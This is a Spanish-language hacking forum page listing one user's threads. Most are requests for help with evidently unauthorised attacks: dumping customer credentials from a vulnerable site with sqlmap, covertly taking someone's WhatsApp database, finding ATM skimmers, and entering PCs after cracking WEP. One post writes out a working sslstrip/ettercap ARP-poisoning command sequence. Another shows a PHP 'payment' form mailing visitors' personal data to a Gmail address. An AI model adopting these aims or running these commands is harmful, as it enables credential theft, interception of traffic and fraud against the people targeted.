Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - pira8990

#1
Hacking / Sqlmap
23 Noviembre 2021, 07:20 AM
Buenas, tengo una duda y me gustaría que me pudiesen ayudar.
Imaginemos que encontramos una web cualquiera vulnerable a ataque boleano o sea a ciegas de una tabla clientes, ahora imaginemos que nos da email y pasword, y dumpeo la info bien imaginemos  que al dumpear salen 15.000 registros obviamente al ser ataque boleano 15.000 registros va a tardar una vida entera, así que mi pregunta es, puedo sacar solo los últimos 500 registros?, se que con havij si puedo hacer esto pero con sqlmap no se como hacerlo, muchas gracias.
#2
PHP / Consulta PHP
23 Febrero 2014, 22:21 PM
Hola a todos, tengo una web con un formulario estandar con lo tipico nombre telefono direccion codigo postal... etc y quisiera que los datos del formulario se quedaran grabados en un fichero txt, es esto posible y si es asi como puedo hacerlo, gracias
#3
PHP / Ayuda con PHP
21 Febrero 2014, 14:12 PM
hola a todos, expongo el tema.

tengo una web en la que he creado un formulario html que llama al archivo envia_form_php.php,pero no recibo ningun mail, el formulario es el siguiente:

Código (html4strict) [Seleccionar]
<form class="contact_form" action="envia_form_php.php" method=post>

<ul>

 <li>

<h3>Realizar proceso</h3>

 </li>

<li>
<label for="name">Nombre:</label>

<input id="name" type="text" placeholder="Ricardo" required />
</li>

<li>


<label for="last_name">Apellidos:</label>

<input id="last_name" type="text" placeholder="Garcia Martin" required />


</li>
<li>


<label for="address":>Dirección:</label>

<input id="address" type="text" placeholder="calle sant joan 36" required />

</li>
<li>


<label for="mail":>Email:</label>

<input id="mail" type="text" placeholder="ejemplo@ejemplo.com" required />

</li>
<li>


<label for="country":>Pais:</label>

<input id="country" type="text" placeholder="España" required />

</li>
<li>



<label for="city":>Ciudad:</label>

<input id="city" type="text" placeholder="Barcelona" required />

</li>
<li>



<label for="zip_code":>Zip:</label>

<input id="zip_code" type="text" placeholder="" required />



</li>
<li>
 
 
 <button class=""submit" type="submit">Pagar</button>
 
</li>
</ul>


</form>




Ahora tengo en el archivo envia_php.php lo siguiente:


Código (php) [Seleccionar]
<?

if (!$HTTP_POST_VARS){

?>

<?

}else{

   //Estoy recibiendo el formulario, compongo el cuerpo

   $cuerpo = "En proceso\n";

   $cuerpo .= "Nombre: " . $HTTP_POST_VARS["name"] . "\n";

   $cuerpo .= "Apellidos: " . $HTTP_POST_VARS["last name"] . "\n";

   $cuerpo .= "Dirección: " . $HTTP_POST_VARS["address"] . "\n";

   $cuerpo .= "Email: " . $HTTP_POST_VARS["email"] . "\n";

   $cuerpo .= "Pais: " . $HTTP_POST_VARS["country"] . "\n";

   $cuerpo .= "Ciudad: " . $HTTP_POST_VARS["city"] . "\n";

   $cuerpo .= "Zip: " . $HTTP_POST_VARS["zip code"] . "\n";

 

   //mando el correo...

   mail("gutierrezgalvezalejandro@gmail.com","Formulario recibido",$cuerpo);

   //doy las gracias por el envío

   echo "Proceso realizado con exito.";
}
?>


que es lo que estoy haciendo mal y como puedo solucionarlo?, gracias a todos y un saludo.

MOD: Utilizar etiquetas [code][/code], dudas de PHP en el subforo de PHP. Leer reglas -> Normas del subforo de Desarrollo Web & Normas del subforo de PHP
#4
Dudas Generales / problema ettercap
26 Noviembre 2013, 21:08 PM
Hola a todos,

estoy realizando pruebas en una lan para realizar un ataque sslstrip y ettercap.
lo primero que hago es poner el modo ip forward

echo 1 > /proc/sys/net/ipv4/ip_forward

luego redirijo el trafico de red del puerto 80 al puerto 1881 por ejemplo

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1881

hago correr el sslstrip

sslstrip -f -l 1881

hasta aquí bien, ahora vamos con el ettercap...

ettercap -T -q -i Wlan0 -M arp:remote // //

no pongo parametros para que me agregue toda la red q haya aunque tambien lo he probado poniendo la ip del pc victima y la del router el resultado fue el mismo.


he aquí el problema...

target (2 host)

0 host added to the list FATAL : ARP poisoning needs a non empty host list


Alguien sabe por que me dice esto y como puedo solucionarlo?

para mas información diré que en mi red tengo un sobremesa conectado por cable
un portatil conectado por wifi y otro portatil que es de donde lanzo el ataque con un adaptador de red alfa y de sistema es un live de linux.

Muchas gracias a todos por vuestra ayuda.

Un saludo.





#5
Dudas Generales / Info ATM SKIMMER
23 Agosto 2013, 18:39 PM
Busco información sobre estos cacharros, donde encontrar este tipo de artefactos y eso...
#6
Hola a todos,

quisiera saber si existe alguna forma de conseguir este fichero "Whatsapp" mediante alguna aplicación o algo parecido para desencryptarlo después pero sin que la persona se de cuenta de que le cojo el fichero, he visto por aquí un tipo de malware que mediante la creación de una aplicación Android te sube el fichero a un servidor ftp para mas tarde poder descargarlo, pero claro solo ver el codigo ya me puesto a sudar, jajajaja no habria algo mas sencillo de hacer o alguien tenga alguna otra idea de como poder choricear este fichero?

gracias a todos espero vuestras ideas un saludo

#7
Hacking / Hack pc
24 Agosto 2011, 21:56 PM
Hola a todos soy novato en el foro y estoy bastante verde en el tema hack.
mi pregunta es la siguiente.

Si con sigo una clave wep y me conecto a ella pasaría a formar parte de su red?, disculpad si digo burradas, con lo que si en el navegador introduzco la puerta de enlace que me da el ipconfig puedo acceder a su router e intentar conectarme a el con los parámetros por defecto.

Pongamos que he conseguido sacar la clave WEP y entrar en el router y en este comprobar las IPs asignadas a los diferentes PCs, ahora mi pregunta es si como formo parte de esa red sabiendo la ip de uno de los PCs asignados por el router podría tener acceso a una de las maquinas haciendo ejecutar \\ip victima ?????

o hay alguna otra forma de entrar en esos PCs.

Gracias a todos y un saludo.